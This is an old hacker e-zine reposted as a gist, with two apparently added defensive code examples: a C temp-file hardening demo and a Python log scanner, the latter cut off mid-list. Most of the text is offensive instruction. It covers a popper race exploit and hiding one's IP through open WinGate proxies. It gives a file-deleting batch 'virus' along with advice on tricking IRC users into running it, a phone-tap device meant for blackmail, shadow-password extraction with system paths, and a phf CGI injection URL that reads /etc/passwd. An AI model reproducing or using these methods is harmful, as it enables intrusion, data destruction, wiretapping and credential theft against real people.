@rvrsh3ll
Created October 31, 2022 12:07
KK KK RRRRRRR AAA CCCCCCCCCC KK KK
KK KK RR R AA AA CC KK KK
KKKKKKK RRRRRRR AA AA CC KKKKKKK
KK KK RR RR AAAAAAAAA CC KK KK
KK KK RR RR AA AA CC KK KK
KK KK OO RR RR OO AA AA OO CCCCCCCCCCC OO KK KK OO

||==--Killer Ride And Chilling Kraftwork--==||
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Disclaimer:
We the writers, and or members of K.R.A.C.K. Claim no responsibility for the
use of this material. It is intended for educational, and inspirational...
psyke, just messing, no seriously, we do not recommend that you use any of
this material, it may lessen your amount of time in the "free world"
considerably. So watch out.
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Index:
- Intro
- Hacking
- Hacking II
- Hacking III
- Phreaking
- Kracking
- Anonymizer
- Unix Hacking
- IP-Spoofing
- Info for beginning Unix Hackers
- Messin with tha president!
- Tips From Sygma
- List of members
- Closing notes
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Intro:
WEEEEEEEEEEEEEEEEEERRRRRRRREEEEEEEEEEEEE BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCKK
DID YOU MISS US???
Yup thats right, K.R.A.C.K. is coming back full strength, and more. All new
members, all new webpages, all new ideas. First let me fill you in on our
new policy.
DESCRIPTION OF THE NEW KRACK:
The New Krack is the reviving of the old Krack with the intention to
give the public a realistic perception of "real" hackers. And not what the
media has made us out to be. However, we will not be centered around hacking
we will also program, trade warez, and other interesting things. This org.
will be for the motivated only, unless you fit this description, dont even
think about it.
EXPECTATIONS OF ALL MEMBERS:
All members are expected to contribute to KRACK... Which means writing at
least one text for the e-zine a month, AND/OR in the case of a *special*
membership agreement you must abide by that special agreement. Failure to
do this will result in probation and possible banning from this organization.
These standards may seem harsh but we plan to have a long lasting, strong,
organization, and to do so we cant tolerate slackers.
FUTURE PLANS:
Our future plans include the following: a newsletter that will be put
out monthly, a 1-800 # bbs, a new irc server, possibly a convention this
summer, and maybe a ftp and telnet site.
That About sums up the NEW COMPLETELY REVISED K.R.A.C.K
-NeTDeViL DocKooL
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Hacking:
********************************************
* Popper Exploit : By DocKool of K.R.A.C.K *
********************************************
************
* About *
************
This file will explain to you how to root owned files on shells using the
popper daemon. If you do not have a shell login on systems that have
/var/spool/mail mode 'drwsrwxrwt' then please dont try whats in this text
cause it wont work. This file may be a little too technical for most
beginners, but im not good at explaining things so dont bitch at me!
**************
* What to do *
**************
#line 59 of pop_dropcopy.c:
# currently running as root: (POP_TMPDROP is /usr/spool/mail/tmpXXXXXX)
> strcpy(template,POP_TMPDROP);
> (void) mktemp(template);
# Now you begin
# If a user guesses the pathname in "template", they probably made a link to
# /etc/nologin, instead of using a script to exploit this bug you can verify
# whether it exists or not by adding sleep(30) here -- after the mktemp().
# Obviously you need root to accomplish this task...
> if ( (tf=fopen(template,"w+")) == NULL ) { /* failure, bail out */
> pop_log(p,POP_PRIORITY,
> "Unable to create temporary temporary maildrop '%s': %s",template,
> (errno < sys_nerr) ? sys_errlist[errno] : "") ;
> return pop_msg(p,POP_FAILURE,
> "System error, can't create temporary file.");
> }
# Right about here the file was probably created.
> /* Now give this file to the user */
> (void) chown(template,pwp->pw_uid, pwp->pw_gid);
> (void) chmod(template,0600);
> /* Now link this file to the temporary maildrop. If this fails it
> * is probably because the temporary maildrop already exists. If so,
> * this is ok. We can just go on our way, because by the time we try
> * to write into the file we will be running as the user.
> */
> (void) link(template,p->temp_drop);
> (void) fclose(tf);
> (void) unlink(template);
> /* Now we run as the user. */
> (void) setuid(pwp->pw_uid);
> (void) setgid(pwp->pw_gid);
**********
* Note *
**********
If your /var/spool/mail is mode 'drwsrwxrwt' this code isn't necessary.
Remove lines 59-82 of pop_dropcopy.c. This doesn't entirely solve the
problem, especially if root reads their mail via popper. The best solution
is to not have /var/spool/mail with world write permissions, as this same type
of problem exists in atleast one delivery agent (/bin/mail), and probably in
user agents.
~~~~Added By DocKool~~~~
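
The pattern in the excerpt above (a name fixed by mktemp(), opened with fopen() while root, then chown()ed by path) set beside an exclusive-create form. This is an added example, not code from popper or from the original text; the function names are hypothetical and the symlink scenario is constructed inside a private scratch directory under /tmp.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from the excerpt: the name is fixed before the file exists, and
 * fopen(..., "w+") follows and truncates whatever already sits at that name. */
static int legacy_create(const char *name)
{
    FILE *tf = fopen(name, "w+");
    return tf != NULL ? fclose(tf) : -1;
}

/* Exclusive create: fails with EEXIST if anything, a symlink included,
 * already occupies the name. Returns 0 on success, otherwise errno. */
static int exclusive_create(const char *name)
{
    int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return errno;
    close(fd);
    return 0;
}

/* Hardened temp drop: mkstemp() picks the name and creates the file in one
 * exclusive step; mode and owner are set on the descriptor, never by path. */
static int safe_tmpdrop(char *tmpl, uid_t uid, gid_t gid)
{
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0600) != 0 || fchown(fd, uid, gid) != 0) {
        close(fd);
        unlink(tmpl);
        return -1;
    }
    return fd;
}

static long size_of(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1L;
}
static void put(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (f != NULL) { fputs(text, f); fclose(f); }
}

struct drop_demo {
    long after_legacy;     /* victim size after the legacy open (0 = clobbered) */
    int  excl_errno;       /* errno from the exclusive create on the same name */
    long after_exclusive;  /* victim size after the exclusive attempt */
    int  safe_private;     /* 1 if the mkstemp() file is a regular 0600 file */
};

/* Constructed scenario in a private scratch directory: "victim" stands in for
 * a file the daemon must not touch, "tmpGUESS" for a guessed template name. */
static struct drop_demo run_drop_demo(void)
{
    struct drop_demo r = { -1, -1, -1, 0 };
    char dir[] = "/tmp/dropdemo-XXXXXX";
    char victim[64], guess[64], tmpl[64];
    struct stat st;
    int fd;

    if (mkdtemp(dir) == NULL) return r;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(guess, sizeof guess, "%s/tmpGUESS", dir);
    snprintf(tmpl, sizeof tmpl, "%s/tmpXXXXXX", dir);

    put(victim, "keep");
    if (symlink(victim, guess) != 0) return r;  /* link already at the name */
    legacy_create(guess);
    r.after_legacy = size_of(victim);
    put(victim, "keep");
    r.excl_errno = exclusive_create(guess);
    r.after_exclusive = size_of(victim);

    fd = safe_tmpdrop(tmpl, getuid(), getgid());
    if (fd >= 0 && fstat(fd, &st) == 0)
        r.safe_private = S_ISREG(st.st_mode) && (st.st_mode & 0777) == 0600;
    if (fd >= 0) close(fd);
    unlink(tmpl); unlink(guess); unlink(victim); rmdir(dir);
    return r;
}

int main(void)
{
    struct drop_demo r = run_drop_demo();
    printf("legacy size=%ld excl_errno=%d excl size=%ld private=%d\n",
           r.after_legacy, r.excl_errno, r.after_exclusive, r.safe_private);
    return 0;
}
```

The exclusive forms close the window inside the daemon; the world-writable spool directory that the note above calls the real problem still has to be fixed separately.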
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Hacking II:
BlueRains WinGate Page
(ready to hack without being caught?)
[Hide your IP trail]
Another discovery by the BR Networking Team
---------------------------------------------------------------------------
What is WinGate?
WinGate is like a Proxy / Gateway server. It allows many Windows based PC's
to connect to the internet all at once, using just one dial up or permanent
connection with few limitations over that of a single PC with an internet
link.
Go to the WinGate home page if you want to learn more about WinGate or
download it (highly suggested).
---------------------------------------------------------------------------
What can WinGate do for me?
WinGate has a major flaw with its default installation. It allows you to
hide your IP address, by routeing whatever you are doing through someone
else's machine running WinGate.
Basically... a lame hackers way of IP Spoofing (but it works!!!). And the
best part is... WinGate keeps NO logs!!! So they (the site you route
through) dont even know you are doing it unless they are watching (highly
unlikely). And even then, they may not even realise what is happening. And
even then, they have NO way to prove you did it!!!
---------------------------------------------------------------------------
What can I do through WinGate?
You route through Wingate, by connecting to the persons machine running
Wingate.
Netscape, IE both allow you to point your browser to route through another
machine (like one running Wingate). You can route FTP and HTTP through
Netscape and IE through a machine running WinGate.
See the "Options/Network Preferences/Proxies/Manual Proxy Configuration"
option for Netscape.
See the "View/Options/Proxy Server/Settings" option for Internet Explorer.
To Telnet through a WinGate machine, just telnet to the machine running
WinGate, and you will be greeted with this prompt 'WinGate>'
Then just type 'x.x.x.x yyyy' or 'zzzzzzz yyyy' or 'zzzzzzzz' or 'x.x.x.x'
where x.x.x.x is the machine you want to logon to's ip number, zzzzzzzz is
its DNS name and yyyy is the port you wish to connect to. ie: '193.25.41.3
25' will take you to the machine at 193.25.41.3 at port 25 and
'www.microsoft.com 21' will take you to microsoft at port 21 (ftp port).
---------------------------------------------------------------------------
What ports can I route through, via a WinGate machine?
Default Wingate installation ports:
21 FTP
23 Telnet
80 WWW
110 POP3
1080 SOCKS4
1090 RealAudio
---------------------------------------------------------------------------
How does this hide my IP address?
There are 3 machines involved when you want to hack a site and hide your ip
via Wingate.
Your machine (me.isp.com), the machine running WinGate you are going to
route to (wingate.dummy.com), and the machine you want to hack
(www.nasa.gov).
Now, if you route through the wingate.dummy.com, it will look like
wingate.dummy.com is the machine that is connected to www.nasa.gov. So
www.nasa.gov's logs will show up a connection from wingate.dummy.com and
not from me.isp.com.
The reason this happens, is the wingate.dummy.com site, has a few pc's,
which all connect out of their local lan, via their wingate.dummy.com
machine (through Wingate) and out onto the net. Now, you are connecting to
their WinGate machine just like the machines on their local network
(*.dummy.com).
So you come into wingate.dummy.com from the internet, not their local
network, and then go back out onto the net, as the machines on their local
network do. This is because, WinGate does not stop machines coming in and
going back out from the internet. Nice design flaw.
---------------------------------------------------------------------------
Common questions
Q. Does WinGate have to be running on my machine?
A. No, you are using the copy of WinGate running on someone elses machine
(on the internet) to hide your IP address from the site you want to hack,
so it looks like you are coming from the site running WinGate.
Q. Can I be traced when I connect to someones machine running WinGate?
A. Your IP address will show up in one window on WinGate (download WinGate
to see) machine, but it is not logged, and the site running WinGate cannot
tell what you are connecting to from them.
Q. Does this work for all versions of WinGate?
A. Currently YES. But version 2 of WinGate is due out soon, which will
incorporate logging and access controls. Thus, sites running version 2 will
be useless to hide your tracks.
Q. Does WinGate run on Win 3.1 / Win 95 / Win NT
A. Yes.
Q. How do I find a machine running WinGate to route through?
A. Thats up to you to figure out... happy hunting
Q. I want to use WinGate for my own lan, is this safe?
A. No, it is not safe. Rather use Microsofts Proxy Server (much better than
WinGate, but still in beta, but it does provide better net connection,
logging and access controls. Requires Windows NT 4).
Q. Is there a registration crack out for Wingate?
A. Yes, it works for most versions. Download it here: WinGate Crack
---------------------------------------------------------------------------
So what now?
Well, now its time for you to go out and find machines running Wingate...
and begin hiding your ip trail...
---------------------------------------------------------------------------
Contact: BlueRain
(c) 1996 - BR Networking Team [Powered by MicroSoft BackOffice]
~~~~Added By BlueRain~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Hacking III:
*****************************
* How to make a Batch Virus *
* By DocKool *
* & *
* NeTDeViL *
*****************************
K.R.A.C.K. Killer Ride And Chilling Kraftwork
Ok, In this text we will explain to you how to make a virus, like a trojan
horse, in a Batch file. Its quite easy... If you know anything about the
DOS commands (I hope for your sake you do). Anyways back to the virus.
First open up Notepad.exe or use dos's very handy editor (or any other
text editor you have), next do the following; (any line beginning with
a * is us)
ECHO OFF
*this stops the user from seeing what the batch file is doing
CD\
*This will bring the virus to DOS and into the default drive.
ECHO Y | del c:\test\*.*
*This will delete all files in the test directory.
It will not delete the sub directories in the test directory!
So then you must add a line like this;
ECHO Y | del c:\test\sub\*.*
*That will delete all the files in the test\sub directory now,
you can imagine the possibilities, of all the directories you could delete.
For instance if you wanted, you could make a Winblows, mIRC, or Netscape
virus, that would say;
ECHO Y | del c:\netscape\*.*
*You get the picture? Next you will want to add something like this;
ECHO HAHA YOU LOOZER I FUCKED YOU UP YOU SUNUVABITCH
* this will display HAHA YOU LOOZER.... in dos and the user will be wondering
what the hell your talkin about.
*Now save your file to .bat (virus.bat). After that you want to obtain a
program called bat2exec.com this program will turn your .bat file into
an .exe we will have one available from the krack web site.
*When all done, you can play around with it a little, make a virus,
and save it as porno.exe, then go in the porno channels on IRC and
send it to some horny lamer. Or make a zip file and put your virus
in with a name like install.exe, also put some other garbage files
in there so the zip will appear bigger. Next go in some warez channel
and claim that the zip is a great game. The possibilities are endless,
just use your imagination. (this works really well in channels with
fserve available so you can plan each and every directory. :)
*The following is an example virus that would kill a directory called c:\test
ECHO OFF
CD\
ECHO Y | del c:\test\*.*
ECHO Y
cls
echo. I just fucked up your test directory!!!
echo. Dont you feel dumb???
*Try making some viruses like this and set them up to delete directories you
dont care about, like c:\test\ Thats the best way ive found to troubleshoot
your virus. Good luck!!!
USAGE:
The possibilities for this are limitless, and any moron can do it. If you
could get a bat file that will reboot the cpu, and give it to somebody on
irc, you could take their channel. You could get it to copy a bulletin
boards password file into the download forum, and then pop in and download
it, you could get this thing to do about anything.
By the way, if you do come up with a way to get the bat file to reboot
the system, please email us, or if you have any updates to this file,
email us. (email addresses listed below)
~~~~Added By DocKool & NeTDeViL~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Phreaking:
DeViLBoX
^^^^^^^CReaTeD By NeTDeViL^^^^^^^
Brought to you by K.R.A.C.K
Da K-Rad Hack Society

Disclaimer
This box was written for entertainment, and educational purposes
only. I do not recommend you use any of this information. And i
claim no responsibility for your actions. Neither does K.R.A.C.K
or any of its members. So dont be a moron and use this info wisely.
What you need
A phone you can "Modify"
A walkman with recording capabilities
headphones
some copper wire
some electric tape
an electric switch
Purpose
Yes i know this box is a lot like others youve read, but it uses some
concepts from other boxes, with my own little satanic twist. So read and
enjoy.
First you need to read the beige box and modify your phone accordingly. when
thats done then complete the following instructions and you will have your
devil box.
What a DevilBox does
well the devil box taps phones without a trace. Normally when tapping a phone
you can be heard on both ends because your phone reduces the amount of
voltage running thru the line. Also you will be able to record the phone
conversations for blackmailing.
How To
ok now youve got your beige box and your ready for the devil box. first
things first. we need to fix the phone with a mute switch. what you need
to do is open the receiver of your phone, and locate the microphone. there
should be two wires connecting microphone to the board. Cut one of these in
half, then strip the wire on both ends. use the electric tape to bond the
half of the wire that is connected to the microphone to a 3 inch piece of
copper wire. then connect the other end of the copper wire to the electric
switch, and the half of the wire that is connected to the board should be
connected to the other side of the electric switch. Now you should have a
mute switch. Now when the switch is open and you pick up the phone it should
cause 0 resistance, making you untraceable.
heres the diagram
switch
|
| |-------------------|
| | |
microphone |||------o/o-------------|- |
|||----------------------|- |
^ |___________________|
|
|
2 wires connecting mike to board
now you need to locate the speaker in the receiver
there should be 2 wires leading into this too. Snip these 2 wires in half
at this point you can throw away the speaker you wont need it. Then strip
both of the wires still connecting to the board. Add copper extensions to
these wires. now open up your walkman. There should be two wires leading
from the spot where you can insert a microphone. Snip these and connect
the copper extensions to the halves of the wires that connect to the green
board. now plug in your headphones. now with the switch closed you should be
able to hear yourself talking into the phone through the headphones. and with
the switch up you shouldnt be able to hear yourself, just the dialtone. if
so youve correctly constructed the devil box. Now just insert a tape and when
you eavesdrop you can record it. Congratulations.
Possible uses
If you are bothering to read this section your an idiot, its obvious what
you use this box for.
~~~~Added By NeTDeViL~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Kracking:
---------------------------------------------------------------------------

---------------------------------------------------------------------------
ANONYMIZER:
You may have seen numerous advertisements on the net for a security web site
called Anonymizer(http://www.anonymizer.com). The web page claims to hide
your IP trail, to fool the logs. At first glance, every hacker in the world
thought, "YES!! NO MORE TELNET BOUNCING!!!", but alas, it isn't as secure as
it seems. The whole idea behind Anonymizer is a CGI script that basically
telnet bounces, but through the World Wide Web port. It has the same
principles, but the WWW port is set up different than the telnet, so it has
faults. I was recently privy to an IP log of a major server(to remain
nameless) and you could easily pick out the Anonymizer users. The truth is,
Anonymizer leaves an IP trail the size of the Great Wall of China, all ending
with your original IP. Anonymizer is good to fool those java applets that
show who you are, but not much else. So before you go and try to use it,
think to yourself, "Do I want my IP on the logs?" If you don't care, be my
guest and use it. But if you are gonna try something nasty, be careful.
-=-_-=disLeXiC=-_-=-
~~~Added By disLeXiC~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
UNIX HACKING:
* What is KRACK? *
we are the true 'cyberkings'
the owners of the world
the elite of the elite
the Bill clintons of the net
we will choose our destiny
and the nets destiny
because we are hackers
We Are KRACK!
--------------------------------------------------------------------------------
Strategy For Getting Root With a shadowed Passwd
step#1
anonymous ftp into the server get passwd
step #2
To defeat password shadowing on many (but not all) systems, write a
program that uses successive calls to getpwent() to obtain the
password file.
Example:
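#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* Walk every entry the password database exposes to this process. */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
               p->pw_passwd,
               (int)p->pw_uid, (int)p->pw_gid, p->pw_gecos, p->pw_dir,
               p->pw_shell);
    endpwent();  /* close the password database */
    return 0;
}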
Or u can Look for the Unshadowed Backup.....
Unix                  Path                                needed Token
----------------------------------------------------------------------
AIX 3                 /etc/security/passwd                !
       or             /tcb/auth/files/<first letter       #
                            of username>/<username>
A/UX 3.0s             /tcb/files/auth/?/                  *
BSD4.3-Reno           /etc/master.passwd                  *
ConvexOS 10           /etc/shadpw                         *
ConvexOS 11           /etc/shadow                         *
DG/UX                 /etc/tcb/aa/user/                   *
EP/IX                 /etc/shadow                         x
HP-UX                 /.secure/etc/passwd                 *
IRIX 5                /etc/shadow                         x
Linux 1.1             /etc/shadow                         *
OSF/1                 /etc/passwd[.dir|.pag]              *
SCO Unix #.2.x        /tcb/auth/files/<first letter       *
                            of username>/<username>
SunOS4.1+c2           /etc/security/passwd.adjunct        ##username
SunOS 5.0             /etc/shadow
                      <optional NIS+ private secure
                            maps/tables/whatever>
System V Release 4.0  /etc/shadow                         x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]                *
UNICOS                /etc/udb
Step #3
crack it
step #4
login and type this
/usr/local/bin/suidperl
chmod 4700 schperl.pl
now we have root perms...!!!!!!!!!!!!!!!
=======================================
C-ya everyone hope u ENjoy,
OD^PHREAK
~~~~Added By OD^PHREAK~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
IP-Spoofing:
"WHAT IS SPOOFING" IN LAYMAN'S TERMS- By NeTDeViL
=============================================
Now I know most of us already know this one, but if you sit in #hackteach
on undernet long enough, your chances of seein some lamer come in and ask
about an IP-Spoofer are pretty high. So if you want to know what this is
SHUTUP AND READ DAMNIT!
SPOOFING- An attempt to gain access to a system by posing as an authorized
user.
Now for a more detailed explanation.
Say Joe@some.domain.com wants to log into ftp.lamers.org and download their
password file. He couldnt do this under normal conditions (unless using a
hacked shell) because they would simply check their logs and see who it was.
Now Joe dont wanna get caught so he loads up his IP-Spoofer, and it changes
his ip address to Hacker@some.domain.com. Now even his ISP thinks he is
hacker@some.domain.com. So now he goes to ftp.lamers.org and downloads their
passwd file. Then disconnects. and cracks the file. Meanwhile lamers.org is
sitting here looking through their logs at whodunnit. up comes
hacker@some.domain.com. they call some.domain.com up, and they dont know who
it was either, since most likely there wont be a hacker@some.domain.com so
joe is sittin high and dry so to speak.
Q.) Do IP-Spoofers really exist?
A.) Yes, but only for systems that use a Unix based OS. The reason for
this is when you try to run a spoofer, it closes winsock.dll. And you're not
connected anymore, so it doesnt work. But they come for most unix based
systems.
---------------------------------------------------------------------------
Q.) How do i find a spoofer?
A.) The web sure comes in handy sometimes...
i just love those search engines.
Our page is rather interesting too, i think im gonna upload
some software to it pretty soon.
One place i found with a GOOD IP Spoofer that actually Works is at...
HTTP://ww2.succeed.net/~coder
~~~~Added By NeTDeViL~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Info for beginning Unix Hackers:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|
|
|
|
| So You Wanna Be a HACKER?
|
|
| By Defiant
| Member of K.R.A.C.K
|++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Purpose of this file:
To inform those of you out there that "think" you're hackers what a true
hacker is and how to be one. And to inform those of you who want to be a
hacker why you should or shouldn't be one depending on what your views are
of a hacker. But basically its an absolute beginners guide to hacking.
Contents:
Section 1 Why do you want to be a hacker?
Section 2 What do you think a hacker is?
Section 3 Read this manifesto!
Section 4 What you need to start on your quest
Section 5 Lets get started!
Section 6 Navigating Unix
*********************************************************************
S E C T I O N 1
Why do you want to be a hacker?
Before you get started ask yourself why you want to pursue the art of
hacking. Are you curious about whats out there? Do you want to cause havoc?
Revenge? To Learn?
If your goal is to crash a system or steal something (unless its information
that should be free!) then stop right now and read the manifesto in section 3.
If your goal is to uncover information, learn, or you're just curious about the
possibilities of the internet and its intricate networks and varieties of systems,
then you are ready to learn this sacred art!
*********************************************************************
S E C T I O N 2
What do you think a Hacker is?
Now that you know why you want to be a hacker you need to know what a
TRUE hacker really is.
There are those who think they are hackers and those who ARE hackers.
Those who think they are, are the criminals who waste precious time to steal
card #'s, crack games, mail bomb someone (now that is lame), or just trash
a system. They are the TRUE LAMERZ. The true hacker is in a pursuit to
fulfill his curiosity or to gain knowledge that others do not possess
(or knowledge that SHOULD be free) and once you have knowledge you have power!
Which i just now realized is probably most hackers real purpose, to feel power
over someone or some system. Glad i'm writing this file because even I am
learning as I write this. Here are some rules to use when you become a hacker:
1. Never damage any system. This will only get you into trouble.
2. Never alter any of the systems files, except for those needed to
insure that you are not detected, and those to insure that you have
access into that computer in the future.
3. Do not share any information about your hacking projects with
anyone but those you'd trust with your life.
4. When posting on BBS's (Bulletin Board Systems) be as vague as
possible when describing your current hacking projects. BBS's CAN
be monitored by law enforcement.
5. Never use anyone's real name or real phone number when posting
on a BBS.
6. Never leave your handle on any systems that you hack in to.
7. DO NOT hack government computers.
8. Never speak about hacking projects over your home telephone line.
9. Keep all of your hacking materials in a safe place.
10. To become a real hacker, you have to hack. You can't just sit
around reading text files and hanging out on BBS's. This is not what
hacking is all about.
*************************************************************************
S E C T I O N 3
Read this manifesto
I think EVERYONE should read this manifesto by the MENTOR.
THE CONSCIENCE OF A HACKER
BY THE MENTOR
Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank
Tampering"... Damn kids. They're all alike. But did you, in your three-
piece psychology and 1950's technobrain, ever take a look behind the
eyes of the hacker? Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me... Damn underachiever.
They're all alike. I'm in junior high or high school. I've listened to
teachers explain for the fifteenth time how to reduce a fraction.
I understand it. "No, Ms. Smith, I didn't show my work. I did it in
my head..." Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me... Or feels threatened by
me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be
here... Damn kid. All he does is play games. They're all alike. And then
it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out,
a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where I belong..." I know everyone here... even
if I've never met them, never talked to them, may never hear from them
again... I know you all... Damn kid. Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been
spoon-fed baby food at school when we hungered for steak... the bits of
meat that you did let slip through were pre-chewed and tasteless.
We've been dominated by sadists, or ignored by the apathetic. The few
that had something to teach found us willing pupils, but those few are
like drops of water in the desert.
This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals. We explore... and you call us
criminals. We seek after knowledge... and you call us criminals. We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our
own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto. You may stop
this individual, but you can't stop us all... after all, we're all alike.
The Mentor
*************************************************************************
S E C T I O N 4
What you need to start hacking.
Text files. You need to read as many text files as you can get a hold of.
I have loads at http://www.elkhart.net/~sborosh/hacking/text/info.html
Programs:
You need a Telnet application to remotely log into another system.
If you are using win95 you have one already. Just go to the start menu and
then to run and in the box type telnet and click ok. If not go to
http://www.elkhart.net/~sborosh/hacking/filez/qvt.zip to get one.
To transfer files you need an ftp (File Transfer Protocol) program.
Again windows 95 comes with one. But i recommend Cuteftp just search for it
with webcrawler or something.
Those are the two main programs you need to navigate your way into systems.
MORE FILEZ:
Once you get into these systems there are some programs you can run and some
exploits (an exploit is a hole in the security which allows you to gain access)
I have loads of filez at www.elkhart.net/~sborosh/hacking/filez/filez.html
I will explain how to use some of them later in this phile.
**************************************************************************
S E C T I O N 5
Getting started on your journey into the unknown!
Ok now that you have the files to do so lets learn how to hack.
Before you can actually hack a system you need to know the type of system
you are dealing with. The most common system you will run into is UNIX
or a unix compatible server. There are many different types of UNIX. They
are CPIX,Berkeley Ver 4.1,Berkeley 4.2,FOS,Genix,HP-UX,
IS/I,OSx,PC-IX,PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX,UTS,Unisys,
Uniplus+, UNOS,Idris,QNIX,Coherent,Cromix,System III,System 7,Sixth edition,
and most recently LINUX. But don't worry they use most of the same commands.
You won't need to learn 100's of commands for each system! Some other systems
there are but I won't get into much because you are just beginning are VAX,
DEC,PRIME and there are many more.
Now you need to find a system to hack. If you know of any cheezy
colleges around or even a big one that you would like to hack an account on
they are the easiest to hack into for your first hack. This bug i am going
to show is called the phf bug it can still be used in some places. But
no thanks to 2600 magazine the phf bug was let out to the public and many
administrators have locked the bug out. Here is how it works:
Find a computer you want to hack I.E www.hackland.com
Open your browser and type
www.hackland.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd
If it says phf not found on system then you are out of luck but if you get
Query Results then you might have a chance of getting the passwd file.
If the passwd file came on your screen save it to a directory as passwd
Then run a cracker program such as cracker jack , or the newly released
john cracker on the passwd file. You can find a password crack on my site
at www.elkhart.net/~sborosh/hacking/filez/filez/html
If you get query results and no file then their passwd file is under a different
name. Here are the names of the passwd files on certain systems. Use the same
command just after cat%20 put the new directory and filename ie /etc/shadow
UNIX System Type:    Path:                                   Token:
AIX 3                /etc/security/passwd                    !
       or            /tcb/auth/files/<first letter of        #
                         username>/<username>
A/UX 3.0s            /tcb/files/auth/*
BSD4.3-Reno          /etc/master.passwd                      *
ConvexOS 10          /etc/shadpw                             *
ConvexOS 11          /etc/shadow                             *
DG/UX                /etc/tcb/aa/user                        *
EP/IX                /etc/shadow                             x
HP-UX                /.secure/etc/passwd                     *
IRIX 5               /etc/shadow                             x
Linux 1.1            /etc/shadow                             *
OSF/1                /etc/passwd[.dir|.pag]                  *
SCO UNIX #.2.x       /tcb/auth/files/<first letter of        *
                         username>/<username>
SunOS 4.1+c2         /etc/security/passwd.adjunct            ##
SunOS 5.0            /etc/shadow
System V 4.0         /etc/shadow                             x
System V 4.2         /etc/security/* database
Ultrix 4             /etc/auth[.dir|.pag]                    *
UNICOS               /etc/udb                                *
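Seen from the web server's side, the request described above leaves a recognizable trace: a /cgi-bin/ target whose parameter decodes to a line break followed by a command and one of the paths in the table. The detector below is an added example, not part of the original zine; the function names are hypothetical and the log lines are constructed samples in Common Log Format.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Path prefixes of the credential stores listed in the table above.
CREDENTIAL_PATHS = (
    "/etc/passwd", "/etc/shadow", "/etc/shadpw", "/etc/master.passwd",
    "/etc/security/", "/etc/tcb/", "/tcb/", "/.secure/etc/passwd",
    "/etc/auth", "/etc/udb",
)


def inspect_target(target):
    """Return the reasons a request target looks like CGI command injection."""
    parts = urlsplit(target)
    if not parts.path.startswith("/cgi-bin/"):
        return []
    query = unquote(parts.query)  # %0a -> newline, %20 -> space
    reasons = []
    if "\n" in query or "\r" in query:
        reasons.append("line break inside a CGI parameter")
    if any(path in query for path in CREDENTIAL_PATHS):
        reasons.append("credential file path inside a CGI parameter")
    return reasons


def scan(lines):
    """Return one finding per suspicious request in an access log."""
    findings = []
    for line in lines:
        match = CLF.match(line)
        if match is None:
            continue  # not a CLF line; a real deployment would count these
        reasons = inspect_target(match.group("target"))
        if reasons:
            findings.append({
                "host": match.group("host"),
                "time": match.group("time"),
                "target": match.group("target"),
                # 200 means the script exists and answered; 404 means it is gone
                "answered": match.group("status") == "200",
                "reasons": reasons,
            })
    return findings


# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/1997:16:05:39 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [27/Feb/1997:16:06:02 -0500] '
    '"GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 2311',
    '192.0.2.10 - - [27/Feb/1997:16:07:11 -0500] '
    '"GET /cgi-bin/search?q=unix+books HTTP/1.0" 200 512',
    '203.0.113.5 - - [27/Feb/1997:16:09:48 -0500] '
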